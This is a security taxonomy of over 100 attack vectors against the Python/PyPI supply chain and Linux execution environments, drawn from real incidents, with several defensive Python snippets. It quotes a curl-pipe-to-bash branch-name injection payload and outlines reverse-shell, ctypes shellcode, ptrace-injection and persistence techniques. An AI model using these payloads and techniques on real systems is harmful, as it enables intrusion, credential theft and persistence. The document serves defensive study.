🤖 Attack vectors against the Python/PyPI supply chain and Linux execution environments

Python’s packaging ecosystem faces a vast and growing attack surface spanning the entire lifecycle from package publication through runtime execution. This taxonomy documents over 100 distinct attack vectors organized across 11 categories, drawn from real-world incidents (2023–2025), published CVEs, and security research. The threat is not theoretical: PyPI receives over 500 malware reports per month and was forced to suspend new registrations four times between 2023 and 2024, and the landmark Ultralytics compromise in December 2024 demonstrated how a single CI/CD injection could deliver cryptominers to 10% of scanned cloud environments. These vectors range from trivial typosquats to sophisticated kernel-level bypasses, and understanding the full taxonomy is essential for evaluating any confinement architecture.


1. Supply chain attacks on PyPI packages

The PyPI ecosystem’s flat namespace, permissive publishing model, and massive scale (~600,000 projects) create a broad attack surface for supply chain compromise. Attack vectors in this category target the trust relationship between package publishers and consumers.

Typosquatting remains the most common vector. Attackers register package names that are slight misspellings of popular packages (e.g., requestss for requests, jeIlyfish using uppercase-I for lowercase-L). In March 2024, 566 typosquatted packages were deployed in a single campaign, forcing PyPI to suspend registrations. A newer variant called slopsquatting registers names that AI coding assistants hallucinate—research indicates 20–35% of hallucinated Python package names were weaponized in 2023.
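As a rough illustration of how such names can be flagged before installation, the sketch below compares a candidate against a small watchlist. The watchlist, the look-alike table, and the 0.85 threshold are all assumptions made for this example, not values used by PyPI or any scanner.

```python
import re
from difflib import SequenceMatcher
from typing import Optional

# Hypothetical watchlist; a real check would load a much larger set of popular names.
POPULAR = {"requests", "numpy", "pandas", "jellyfish", "urllib3"}

# A few look-alike substitutions (illustrative, far from exhaustive).
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "0": "o"})


def normalize(name: str) -> str:
    """Fold look-alike characters, then lowercase and collapse separators."""
    folded = name.translate(CONFUSABLES).lower()
    return re.sub(r"[-_.]+", "-", folded)


def likely_typosquat(candidate: str, threshold: float = 0.85) -> Optional[str]:
    """Return the watchlist name that `candidate` appears to imitate, or None."""
    if re.sub(r"[-_.]+", "-", candidate.lower()) in POPULAR:
        return None  # exact match for a known project
    norm = normalize(candidate)
    for known in sorted(POPULAR):
        similarity = SequenceMatcher(None, norm, known).ratio()
        if norm == known or similarity >= threshold:
            return known
    return None
```

A check like this only catches near-misses of names already on the watchlist; slopsquatted names that resemble nothing popular would pass straight through.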

Dependency confusion exploits the collision between internal/private package names and public PyPI. When pip install is run with --extra-index-url, pip consults both the private and public indexes and installs whichever candidate has the highest version number. Alex Birsan’s 2021 research breached 35+ companies including Apple and Microsoft. The PyTorch torchtriton incident (December 2022) demonstrated real exploitation, stealing SSH keys and environment variables.
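The selection rule can be modeled in a few lines. This is a simplified sketch of "highest version wins across all indexes", not pip's resolver; the index names, the package name acme-utils, and the version numbers are hypothetical.

```python
def parse_version(text):
    """Parse a plain dotted numeric version such as '1.2.0' (no pre-release tags)."""
    return tuple(int(part) for part in text.split("."))


def pick_candidate(indexes, name):
    """Return (index_name, version) for the highest version found on any index."""
    candidates = [
        (parse_version(version), index_name, version)
        for index_name, packages in indexes.items()
        for version in packages.get(name, [])
    ]
    if not candidates:
        return None
    _, index_name, version = max(candidates)
    return index_name, version


# Hypothetical setup: an internal package whose name an attacker also registers publicly.
INDEXES = {
    "private": {"acme-utils": ["1.2.0", "1.3.0"]},
    "public": {"acme-utils": ["99.0.0"]},
}
```

With these inputs, pick_candidate(INDEXES, "acme-utils") selects the public 99.0.0 upload, which is why the origin of a package matters as much as its name.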

Compromised build pipelines represent the most sophisticated vector. The Ultralytics YOLO compromise (December 4–7, 2024) exploited a GitHub Actions script injection vulnerability: the attacker crafted malicious branch names in draft pull requests containing shell payloads like $({curl,-sSfL,<url>}${IFS}|${IFS}bash), which executed during CI/CD, injecting XMRig cryptominers into four PyPI releases. The package had ~60 million total downloads.

Account takeovers target maintainer credentials through phishing (fake domains like pypi-mirror[.]org), credential stuffing, and expired email domain hijacking. PyPI invalidated ~1,800 accounts with expired email domains and mandated 2FA for all maintainers by January 2024.

Malicious maintainers build legitimate packages, then inject malicious code. The aiocpa package (November 2024) was a genuine Crypto Pay API client whose own maintainer introduced obfuscated credential-stealing code only in the PyPI-published version—the GitHub repository remained clean.

Revival hijacking exploits the fact that deleted PyPI package names become immediately available. JFrog identified 120,000+ removed packages at risk, with ~22,000 still actively referenced. Their proof-of-concept “security holding” packages accumulated 200,000 downloads in three months, demonstrating the threat’s reality.

Star-jacking links malicious packages to popular GitHub repositories. PyPI displays the linked repository’s star count without validation. Analysis shows 3.03% of all PyPI packages have non-unique Git references. Namespace squatting exploits PyPI’s lack of organizational scoping (unlike npm’s @org/package), and protestware involves maintainers deliberately sabotaging their own packages, as seen with the atomicwrites deletion in 2022.


2. Binary and wheel-level attacks

Wheel packages can bundle compiled binaries that evade Python-focused security scanners entirely. These vectors exploit the opacity of native code.

Injected shared libraries in manylinux wheels represent a potent vector. The auditwheel repair tool copies system .so files into wheels and sets RPATH to $ORIGIN/.libs_*. A malicious .so using __attribute__((constructor)) executes code the moment the library loads—before any Python code runs. The termncolor/colorinal packages (2025) dropped terminate.so on Linux systems for backdoor functionality.

Modified Python bytecode files hide payloads in opaque .pyc files that most security tools cannot scan. The fshec2 package (April 2023, discovered by ReversingLabs) was the first known supply chain attack using compiled bytecode to evade detection. It shipped full.pyc containing C2 functionality for downloading commands and establishing cron-job persistence. Multiple layers of obfuscation using marshal.loads() and exec() create nested encryption that tools cannot statically analyze.

Trojanized compiled dependencies bundled in wheels exploit the same pattern as the xz-utils backdoor (CVE-2024-3094)—the definitive example of this class. The attacker spent ~3 years gaining maintainer trust, then inserted malicious code hidden in binary test files that was extracted during build, modifying liblzma.so to hijack OpenSSL’s RSA_public_decrypt via glibc’s IFUNC mechanism. This pattern is directly replicable in Python wheel builds.

ELF binary manipulation includes adding parasitic code in section padding (code caves), modifying PLT/GOT entries to redirect calls, and symbol table poisoning via IFUNC resolvers. Malicious RPATH/RUNPATH settings can force loading of attacker-controlled libraries by pointing to writable directories. Because DT_RPATH (when no DT_RUNPATH is present) is searched before LD_LIBRARY_PATH, users cannot override it through the environment.

Steganographic payloads hide malicious code in binary data files. Checkmarx discovered 27 malicious PyPI packages (November 2023) using steganography in image files. Phylum found a package shipping a 17MB PNG with a Go binary (Sliver C2 agent) appended after the image’s end-of-file marker. Platform-specific payload activation checks platform.system() or /proc/self/cgroup to trigger only on Linux, as seen in ESET’s analysis of 116 malicious packages deploying different backdoors per OS.
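The appended-binary trick is detectable by walking the PNG chunk structure and counting what follows IEND. The following is a minimal sketch under the assumption that the file is otherwise well-formed; it does not validate CRCs, and make_chunk is a helper introduced here only to build test data.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def make_chunk(chunk_type: bytes, payload: bytes) -> bytes:
    """Build one PNG chunk: length, type, payload, CRC (helper for demos)."""
    crc = zlib.crc32(chunk_type + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + chunk_type + payload + struct.pack(">I", crc)


def png_trailing_bytes(data: bytes) -> int:
    """Return how many bytes follow the IEND chunk; raise ValueError if not a PNG."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    offset = len(PNG_SIGNATURE)
    while offset + 8 <= len(data):
        length, chunk_type = struct.unpack(">I4s", data[offset:offset + 8])
        offset += 8 + length + 4  # chunk header + payload + CRC
        if chunk_type == b"IEND":
            return max(len(data) - offset, 0)
    raise ValueError("IEND chunk not found")
```

Any nonzero result means the file carries data an image viewer will ignore, which is worth a closer look when the file ships inside a package.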


3. Source-level attacks

Python’s dynamic nature provides numerous mechanisms for hiding malicious code in plain sight within source files.

Obfuscated malicious code is the dominant pattern. Common techniques include base64 + exec chains, Fernet encryption (used in the March 2024 campaign of 500+ packages), multi-layer marshal/compile obfuscation, and nested encoding with variable names like magic, love, god, destiny (JFrog’s “noblesse” family, ~30,000 downloads). The simple-mali-pkg package contained dozens of layers of encryption hiding an infostealer.

Trojan source attacks (CVE-2021-42574) use Unicode bidirectional control characters to make code appear different from how it executes. Invisible characters like U+2067 (Right-to-Left Isolate) reorder displayed text, making security checks appear present during review while actually being commented out. Homoglyph attacks (CVE-2021-42694) replace Latin characters with visually identical Unicode characters from other scripts—a function hаshPassword with Cyrillic ‘а’ is entirely different from hashPassword with Latin ‘a’.
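Both tricks leave traces that a simple scan can surface. The sketch below reports bidirectional control characters by position and flags identifiers that mix scripts. Using the first word of the Unicode character name as the "script" is a heuristic chosen for this example, not a proper Unicode script lookup.

```python
import unicodedata

# Bidirectional embedding, override, and isolate controls.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
    "\u2066", "\u2067", "\u2068", "\u2069",
}


def find_bidi_controls(source: str):
    """Return (line, column, codepoint) for every bidi control character."""
    return [
        (lineno, col, f"U+{ord(ch):04X}")
        for lineno, line in enumerate(source.splitlines(), 1)
        for col, ch in enumerate(line, 1)
        if ch in BIDI_CONTROLS
    ]


def has_mixed_script(identifier: str) -> bool:
    """Heuristic: do the letters come from more than one script (e.g. LATIN and CYRILLIC)?"""
    scripts = set()
    for ch in identifier:
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return len(scripts) > 1
```

For example, has_mixed_script("h\u0430shPassword") is true because the second letter is Cyrillic, while the all-Latin spelling passes.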

Hidden code in __init__.py exploits automatic execution on import. Attackers use massive horizontal whitespace to push malicious code off-screen (the trojanized colorama technique), or place payloads deep in subpackage init files. Code hidden in docstrings uses exec(function.__doc__) to execute what appears to be documentation. Malicious decorators silently exfiltrate function arguments (the aiocpa attack wrapped the CryptoPay constructor to steal credentials), while malicious metaclasses propagate through entire class hierarchies via inheritance.

Polyglot files are valid in multiple formats simultaneously. A file can function as both a Python script and a shell script, or both a valid image and an executable. The xz-utils attack decoded binary test data files via shell scripts during build—a form of polyglot abuse. A critical cross-cutting vector is the wheel-vs-source discrepancy: ESET discovered campaigns where the source distribution is clean but the wheel contains malicious code, and pip prefers wheels by default.


4. Runtime and memory attacks

CPython’s C implementation presents a rich surface for memory corruption and runtime manipulation, particularly through C extensions and the interpreter’s internal data structures.

CPython’s pymalloc allocator lacks standard heap mitigations—no double-free detection, no canaries, no address validation. Research by tin-z (2023) demonstrated that double-free is trivially exploitable: freeing a block twice yields two allocations to the same memory, enabling an arbitrary write primitive. The allocator’s pymalloc_free() performs only address_in_range() checks.

ROP/JOP gadget chains are practical against CPython. A statically-linked Python binary provides 10,000+ usable gadgets. CPython’s extensive use of function pointer tables (tp_call, tp_getattr in PyTypeObject) provides natural indirect call sites for JOP attacks. Known CVEs enabling these chains include CVE-2021-3177 (buffer overflow in _ctypes/callproc.c) and CVE-2016-5636 (integer overflow in zipimport.c).

Python object corruption targets the two critical fields at the start of every PyObject: ob_refcnt (offset 0) and ob_type (offset 8). Changing ob_type causes type confusion with controlled memory layout interpretation. Decrementing ob_refcnt to zero triggers premature deallocation, creating use-after-free. The 35C3 CTF “Collection” challenge demonstrated crafting fake bytearray objects in heap memory for arbitrary read/write.

ctypes provides unrestricted memory access from pure Python: ctypes.string_at(address, length) for arbitrary reads, ctypes.memmove(target, source, length) for writes, and ctypes.CFUNCTYPE(c_int)(address)() for calling arbitrary function pointers. Combined with mmap, attackers create executable memory regions and run shellcode entirely from Python. Writes through /proc/self/mem bypass page protections entirely: the kernel treats them like ptrace accesses, allowing writes to read-only and executable pages. The dlinject tool demonstrates injecting shared libraries into running processes through this mechanism.

Data-only attacks modify Python’s internal data structures without code injection. The DIMVA 2018 paper “Bytecode Corruption Attacks Are Real” demonstrated four strategies: overwriting bytecode strings, corrupting bytecode pointers, manipulating function hash maps, and injecting native function calls. Frame object manipulation exploits LOAD_FAST’s lack of bounds checking (demonstrated by JuliaPoo, 2021) to read arbitrary PyObject* pointers from memory relative to the frame, achieving arbitrary read primitives.

PaX/grsecurity’s MPROTECT blocks mmap-based shellcode execution and JIT spray by preventing RWX memory creation. However, Python requires MPROTECT exceptions because libffi uses RWX trampolines for ctypes/cffi. With MPROTECT enabled, ctypes shellcode injection and mmap-based attacks are blocked, but data-only attacks, bytecode manipulation, and /proc/self/mem writes remain viable.


5. Filesystem and network attacks

Once malicious Python code achieves execution, the filesystem and network provide the primary channels for damage and exfiltration.

Credential and token theft is the most common payload in real-world PyPI malware. The fabrice package (typosquat of fabric, live since 2021, 37,000+ downloads) exfiltrated AWS credentials on Linux. The W4SP Stealer campaign stole browser cookies, Discord tokens, and crypto wallet data. Twenty “time”-related packages (March 2025) specifically targeted cloud access tokens for AWS, Alibaba Cloud, and Tencent Cloud with 14,100+ downloads.

Reverse shells are deployed by numerous malicious packages. The canonical Python reverse shell uses socket.connect() + os.dup2() + subprocess.call(["/bin/sh"]). The importantpackage used a novel technique: C2 traffic routed via HTTPS to pypi.python.org, then rerouted by Fastly CDN to the actual C2 server, making traffic indistinguishable from legitimate PyPI communication. MCP server packages (2025) ran reverse shells before starting the MCP server, exploiting the emerging AI tool chain.

DNS-based exfiltration encodes stolen data in DNS query subdomain labels. The ipboards and pptest packages (2021, discovered by JFrog) were the first documented PyPI packages using DNS tunneling for covert data exfiltration. This technique passes through most firewalls unmonitored.
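One common heuristic for spotting this kind of tunneling is to look for unusually long or high-entropy subdomain labels. The sketch below is an illustration only: the length and entropy thresholds are assumptions picked for the example, and the rule of ignoring the last two labels is a crude stand-in for real registered-domain parsing.

```python
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Shannon entropy of the character distribution, in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in Counter(text).values())


def suspicious_query(hostname: str, max_label: int = 40, min_entropy: float = 3.5) -> bool:
    """Flag hostnames whose subdomain labels look like encoded data."""
    labels = hostname.rstrip(".").split(".")
    subdomains = labels[:-2]  # crude: treat the last two labels as the registered domain
    return any(
        len(label) > max_label
        or (len(label) >= 16 and shannon_entropy(label) >= min_entropy)
        for label in subdomains
    )
```

Legitimate services such as CDNs also generate random-looking labels, so a heuristic like this is a triage signal rather than a verdict.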

Persistence mechanisms deployed by real PyPI malware include:

  • SSH authorized_keys injection: adding attacker public keys for persistent remote access (TeamTNT campaigns)
  • Cron job injection: the fshec2 package established cron-based persistence on Linux
  • .bashrc/.profile modification: commands execute invisibly on every shell open
  • Git hook injection: pre-commit/post-merge hooks execute during git operations
  • pip.conf modification: redirecting all future pip install commands to attacker repositories

Symlink attacks exploit TOCTOU race conditions. CVE-2025-68146 in the filelock library (used by virtualenv, PyTorch, poetry, tox) allowed symlink attacks with a race window of ~1–5 microseconds, succeeding in 1–3 attempts. Privilege escalation via Python capabilities (cap_setuid+ep → instant root shell), SUID exploitation, and PATH hijacking are well-documented in Linux privilege escalation guides (GTFOBins).


6. IPC and inter-process attacks

Malicious Python code can attack other processes through Linux’s numerous IPC mechanisms.

Pickle deserialization attacks are the most critical IPC vector. The __reduce__() method returns a callable and arguments that pickle invokes during deserialization—pickle.loads(malicious_data) achieves arbitrary code execution trivially. This extends to dill, jsonpickle, shelve, and marshal. PyYAML’s yaml.load() without Loader=SafeLoader allows arbitrary object construction. ML model files (.pkl) are a growing attack vector—weaponized PyTorch and scikit-learn models can execute code on load.
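The standard library's documented mitigation is to subclass pickle.Unpickler and override find_class so that only approved globals resolve. Below is a minimal sketch of that pattern. The allowlist contents are an assumption for the example, and CallsLenOnLoad is a harmless stand-in for a hostile object (it asks the loader to call len rather than anything dangerous).

```python
import io
import pickle

# Hypothetical allowlist: only these (module, name) pairs may be resolved on load.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Every global referenced by the pickle stream passes through here.
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but refuses globals outside SAFE_GLOBALS."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class CallsLenOnLoad:
    """Benign stand-in for a malicious object: its pickle requests a call to len('abc')."""

    def __reduce__(self):
        return (len, ("abc",))
```

Plain containers of primitives still load, while the __reduce__ payload is rejected before its callable is ever looked up. An allowlist reduces the attack surface but does not make untrusted pickles safe in general; a data-only format remains the more robust choice.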

Unix domain socket hijacking is particularly dangerous when Docker’s socket (/var/run/docker.sock) is accessible: write access enables full container creation with host filesystem mounts for trivial root escalation. Abstract namespace sockets (whose names begin with a null byte, \0) have no filesystem permissions, so any process in the same network namespace can connect, and they cannot be protected by ACLs.

D-Bus message injection targets privileged system services. CVE-2015-8612 in blueman passed user input to eval() without sanitization—any local user could execute code as root. The USBCreator D-Bus vulnerability on Ubuntu allowed arbitrary file overwrite as root without a password.

Shared memory attacks via /dev/shm (world-writable tmpfs) and mmap can read or corrupt data structures of other processes. A segment that shm_open() creates with a permissive mode such as 0666 is readable and writable by any user. Ptrace-based process injection uses PTRACE_ATTACH → PTRACE_POKETEXT → PTRACE_SETREGS to inject shellcode into running processes (MITRE ATT&CK T1055.008), though kernel.yama.ptrace_scope=1 (the default on Ubuntu and several other distributions) restricts attachment to descendant processes.

Environment variable injection to child processes poisons LD_PRELOAD, PYTHONPATH, PATH, and http_proxy/https_proxy, redirecting all child process behavior through attacker-controlled configurations. Clipboard hijacking via X11 monitors for cryptocurrency address patterns and replaces them with attacker wallets—the forenitq package family implemented this using pyperclip.
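A parent process that launches helpers can blunt this by passing an explicit, scrubbed environment instead of inheriting its own. The sketch below shows one way to do that. The prefix list, the proxy names, and the fixed PATH value are assumptions for illustration and would need tuning for a real deployment.

```python
import os

# Variable families that influence the dynamic loader or the Python interpreter.
RISKY_PREFIXES = ("LD_", "PYTHON")
RISKY_NAMES = {"http_proxy", "https_proxy", "HTTP_PROXY", "HTTPS_PROXY"}
TRUSTED_PATH = "/usr/bin:/bin"  # assumed fixed search path for child processes


def scrubbed_env(env=None):
    """Return a copy of `env` (default: os.environ) without loader, interpreter, or proxy overrides."""
    source = os.environ if env is None else env
    clean = {
        key: value
        for key, value in source.items()
        if not key.startswith(RISKY_PREFIXES) and key not in RISKY_NAMES
    }
    clean["PATH"] = TRUSTED_PATH
    return clean
```

The result can be handed to subprocess.run(..., env=scrubbed_env()) so that the child never sees variables such as LD_PRELOAD or PYTHONPATH.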


7. Side-channel attacks

Even confined processes can leak information through observable side effects of computation.

Timing attacks against Python’s default string comparison (==) with early termination create measurable side channels for recovering secrets byte-by-byte. The Keyczar HMAC implementation was bypassed with ~1000 queries per byte over localhost TCP. Python added hmac.compare_digest() in 3.3 as mitigation, but many applications still use == for secret comparison.
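The leak comes from how much work the comparison does before it gives up. The sketch below makes that visible with a deliberately naive comparison that reports how many bytes it examined, next to a verification helper built on hmac.compare_digest. The function names naive_equal and verify_tag are made up for this example.

```python
import hmac


def naive_equal(a: bytes, b: bytes):
    """Early-exit comparison; returns (equal, bytes_examined) to expose the leak."""
    if len(a) != len(b):
        return False, 0
    for examined, (x, y) in enumerate(zip(a, b), 1):
        if x != y:
            return False, examined  # work done depends on the matching prefix
    return True, len(a)


def verify_tag(key: bytes, message: bytes, tag: bytes) -> bool:
    """Check an HMAC-SHA256 tag without an early-exit comparison."""
    expected = hmac.new(key, message, "sha256").digest()
    return hmac.compare_digest(expected, tag)
```

A guess that shares three leading bytes with the secret makes naive_equal examine four bytes instead of one or two. That is the signal an attacker measures as time.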

Cache-based side channels (Flush+Reload, Prime+Probe) exploit the ~100× timing difference between cache hits and misses. Python processes sharing libssl.so pages are susceptible; CacheBleed (CVE-2016-0702) demonstrated timing attacks on OpenSSL’s constant-time RSA implementation. Microarchitectural attacks (Spectre, Meltdown) affect Python processes whose secrets reside in memory accessible to speculative execution.

Covert channels within permitted resource envelopes are the most relevant for sandbox evasion. The Comprezzor research (2021) demonstrated memory compression timing side channels achieving 643.25 bits/hour over 14 internet hops, leaking secrets from PostgreSQL via a Python-Flask application. CPU timing modulation, memory pressure signaling, and filesystem metadata channels (inode allocation patterns, stat() timestamps) all operate within normal resource envelopes.

/proc-based information leakage is particularly powerful: /proc/[pid]/maps defeats ASLR by revealing base addresses, /proc/[pid]/environ exposes environment variables with API keys, and /proc/[pid]/stat leaks instruction and stack pointer values. Resource exhaustion side channels include hash collision DoS (CVE-2012-1150), which exploited Python’s then-predictable string hash to force O(n²) dict operations and prompted Python’s hash randomization (PYTHONHASHSEED).


8. Installation-time attacks

Installation is the single most dangerous phase in the Python package lifecycle. 56% of documented malicious pip packages execute during installation via setup.py, not at import time.

setup.py arbitrary code execution is the most exploited mechanism. The setup.py file runs with the installing user’s privileges when pip processes source distributions. Common patterns override the install command class: cmdclass={'install': MaliciousInstall}. Critically, even pip download (not install) triggers setup.py execution for metadata extraction via egg_info. The March 2024 campaign used Fernet-encrypted payloads in setup.py across 500+ packages.
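Because setup.py is ordinary Python, it can be inspected with the ast module without ever being executed. The sketch below flags cmdclass overrides and a few dynamic-execution calls. The list of suspicious names is an assumption for the example, and SAMPLE_SETUP is a benign, made-up file used only to show the output.

```python
import ast

SUSPICIOUS_CALLS = {"exec", "eval", "compile", "__import__"}


def audit_setup_source(source: str):
    """Parse (never run) a setup.py and return sorted (line, finding) pairs."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        if isinstance(node.func, ast.Name) and node.func.id in SUSPICIOUS_CALLS:
            findings.append((node.lineno, f"call to {node.func.id}()"))
        for keyword in node.keywords:
            if keyword.arg == "cmdclass":
                findings.append((keyword.value.lineno, "cmdclass override"))
    return sorted(findings)


# Benign, hypothetical example input.
SAMPLE_SETUP = '''
from setuptools import setup
from setuptools.command.install import install

class CustomInstall(install):
    def run(self):
        exec("print('hook ran')")
        install.run(self)

setup(name="demo", cmdclass={"install": CustomInstall})
'''
```

Many legitimate packages override cmdclass, so a hit is a prompt for review rather than proof of malice. Obfuscated payloads can also hide behind attribute lookups that this name-based check does not follow.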

PEP 517 build backend exploitation allows malicious packages to specify custom build backends in pyproject.toml that execute arbitrary code. The build-backend can reference in-tree code via backend-path, and even metadata retrieval (prepare_metadata_for_build_wheel) triggers execution. PEP 643 “Dynamic” metadata entries ensure pip must build the package for metadata, guaranteeing code execution persists with modern build systems. An attacker needs only a single source distribution anywhere in the dependency graph.

Lock file poisoning was demonstrated by Phylum’s “Bad Beat Poetry” research: a malicious package added via poetry add --lock creates complex lockfile changes that are difficult to review, and if the manifest entry is later removed without regenerating the lockfile, the malicious dependency persists. Egg-info manipulation uses cmdclass={'egg_info': MaliciousCommand} to execute during metadata generation—even operations intended as “safe” like pip download trigger this code path.

Wheels (.whl files) do NOT execute setup.py and are fundamentally safer—pip prefers wheels when available. However, not all packages have wheel distributions, and an attacker needs only one source distribution in the entire dependency tree to achieve code execution.


9. Import and loading-time attacks

Python’s extensible import system provides numerous injection points, several of which have been exploited in real-world attacks.

.pth file injection is the most critical vector. Files ending in .pth in site-packages are processed during interpreter startup, and lines beginning with import are executed as Python code. In CVE-2024-3400 (Palo Alto GlobalProtect zero-day), attackers deployed a backdoor via /usr/lib/python3.6/site-packages/system.pth containing base64-encoded malware that ran each time a Python interpreter started on the device. MITRE catalogs this as T1546.018 (“Event Triggered Execution: Python Startup Hooks”). CPython issue #78125 acknowledged that “pth files are evil.”
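Auditing for this is straightforward because the trigger is purely textual: the site module executes lines that start with "import" followed by a space or tab. The following sketch lists such lines in a directory. The function name is invented for this example, and which directories to scan is left to the caller.

```python
import os


def executable_pth_lines(directory: str):
    """Return (filename, line_number, text) for .pth lines that site would execute."""
    findings = []
    for entry in sorted(os.listdir(directory)):
        if not entry.endswith(".pth"):
            continue
        path = os.path.join(directory, entry)
        with open(path, encoding="utf-8", errors="replace") as handle:
            for lineno, line in enumerate(handle, 1):
                # Mirrors the prefix test used when .pth files are processed.
                if line.startswith(("import ", "import\t")):
                    findings.append((entry, lineno, line.rstrip()))
    return findings
```

Running it over each site-packages directory gives a short list to review. Some legitimate tools install executable .pth lines too, so the output needs a human eye.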

Import hook manipulation via sys.meta_path intercepts any import statement before filesystem lookup. An attacker’s custom finder inserted at position 0 can shadow any module, including the standard library. sitecustomize.py and usercustomize.py execute automatically at interpreter startup—placing either file anywhere on sys.path runs arbitrary code with no user interaction.

sys.path poisoning exploits Python’s default of placing the script’s directory (or '', the current working directory, for interactive and -c invocations) at sys.path[0]. When a Python script runs SUID or under sudo, an attacker who can write to that directory plants a shadow module (e.g., webbrowser.py) that spawns a root shell on import. Python 3.11 added the -P flag and PYTHONSAFEPATH to mitigate this.
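A quick way to spot shadow modules is to compare the .py files in a directory against the interpreter's own list of standard library names. The sketch below assumes Python 3.10 or later, where sys.stdlib_module_names exists. On older versions it finds nothing rather than failing.

```python
import os
import sys


def shadowed_stdlib_modules(directory: str):
    """Return .py files in `directory` whose names collide with standard library modules."""
    stdlib = getattr(sys, "stdlib_module_names", frozenset())  # Python 3.10+
    hits = []
    for entry in sorted(os.listdir(directory)):
        stem, extension = os.path.splitext(entry)
        if extension == ".py" and stem in stdlib:
            hits.append(entry)
    return hits
```

Checking the directory that will become sys.path[0] before running a privileged script would reveal a planted webbrowser.py. Packages (directories) with colliding names are not covered by this simple version.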

Cached bytecode poisoning replaces .pyc files in __pycache__/. If the attacker matches the header’s magic number, timestamp, and source file size (obtainable via stat), Python loads the poisoned bytecode without recompiling. PEP 552 hash-based validation exists but is not enabled by default for performance reasons.
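The header fields mentioned above occupy the first 16 bytes of a .pyc file in the PEP 552 layout: a 4-byte magic number, a 4-byte flags word, then either the source mtime and size or an 8-byte source hash. The sketch below decodes that header so a reviewer can tell which validation mode a cached file relies on. The function name and the returned dictionary keys are choices made for this example.

```python
import importlib.util
import struct


def describe_pyc_header(header: bytes) -> dict:
    """Decode the 16-byte .pyc header (PEP 552 layout)."""
    if len(header) < 16:
        raise ValueError("a .pyc header is 16 bytes long")
    flags = struct.unpack("<I", header[4:8])[0]
    info = {
        "magic_matches": header[:4] == importlib.util.MAGIC_NUMBER,
        "hash_based": bool(flags & 0x1),    # bit 0: hash-based pyc
        "check_source": bool(flags & 0x2),  # bit 1: validate hash against the source
    }
    if info["hash_based"]:
        info["source_hash"] = header[8:16].hex()
    else:
        mtime, size = struct.unpack("<II", header[8:16])
        info["source_mtime"] = mtime
        info["source_size"] = size
    return info
```

A timestamp-based file only records the source's mtime and size, which is exactly what an attacker can copy. A checked hash-based file ties the cache to the source contents instead.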

Codec registration attacks exploit codecs.register() search functions called during encoding/decoding. The # -*- coding: evil_codec -*- source file declaration triggers codec lookup at parse time before any code executes. PYTHONPATH poisoning prepends attacker directories to sys.path, redirecting all imports. Python’s -E flag and -I (isolated) mode disable PYTHON* environment variables as mitigation.

Entry point exploitation targets plugin auto-discovery: a malicious package declaring entry points matching a framework’s plugin groups (e.g., pytest11) executes automatically when the host application loads plugins, without the user ever importing the malicious package directly.


10. Dependency-based attacks

Dependency resolution introduces attack vectors distinct from those targeting individual packages.

Transitive dependency hijacking targets indirect dependencies deep in the tree. The cappership Solana campaign (January 2025) published semantic-types as initially benign, then introduced malware. Five other Solana-related packages depended on it, ensuring any installation pulled the hidden payload. Combined downloads exceeded 25,900. The Ultralytics compromise similarly impacted downstream projects ComfyUI, SwarmUI, and adetailer through transitive dependencies.

Version pinning attacks exploit loose specifications like >=1.0 or ~=1.0. Revival hijack attackers use extremely high version numbers (e.g., 9999.0.0) to guarantee installation by any system running pip install --upgrade. Dependency tree manipulation crafts packages with install_requires specifications designed to pull in malicious sub-dependencies through chains of seemingly unrelated packages.

Lock file poisoning targets poetry.lock, Pipfile.lock, and requirements.txt. Phylum demonstrated that poetry add --lock introduces complex, hard-to-review changes, and malicious entries can persist even after manifest cleanup if the lockfile isn’t regenerated. Requirements file manipulation through compromised repositories or CI/CD systems adds malicious dependencies that may not receive the same scrutiny as application code changes.
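A lightweight review aid for requirements files is to flag every entry that is not pinned to an exact version, and every pinned entry that lacks a hash. The sketch below handles only simple one-line requirements. The regular expression and the finding messages are assumptions for this example, and it does not parse the full requirement grammar (URLs, environment markers, and line continuations are out of scope).

```python
import re

# name, optional [extras], then everything up to an environment marker
REQUIREMENT = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)(?:\[[^\]]*\])?\s*([^;]*)")


def audit_requirements(text: str):
    """Return (line_number, finding) for loosely specified or unhashed entries."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split(" #", 1)[0].strip()
        if not line or line.startswith(("#", "-")):
            continue  # blank lines, comments, and options such as -r or --index-url
        match = REQUIREMENT.match(line)
        if match is None:
            findings.append((lineno, "could not parse"))
            continue
        spec = match.group(2).split("--hash", 1)[0].strip()
        if not spec.startswith("==") or "*" in spec or "," in spec:
            findings.append((lineno, "not pinned to an exact version"))
        elif "--hash=" not in line:
            findings.append((lineno, "pinned without --hash"))
    return findings
```

pip can enforce the second condition itself through its --require-hashes mode; a script like this is mainly useful for making loose entries visible in code review.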


11. Kernel and LSM bypass attacks

For confined Python execution environments on hardened Linux, kernel-level bypasses represent the final escalation path.

io_uring is the most significant bypass vector. It performs I/O through shared ring buffers rather than one syscall per operation, so seccomp filters and syscall-based monitors never see the individual reads, writes, or connects. With 61 supported operations including file read/write and network connect/send/recv, ARMO’s “Curing” rootkit demonstrated full C2 functionality that evaded Falco, Microsoft Defender, and other runtime security tools. Google reported that 60% of kernel exploits submitted to their bug bounty in 2022 targeted io_uring. Docker’s default seccomp profile now blocks io_uring_setup.

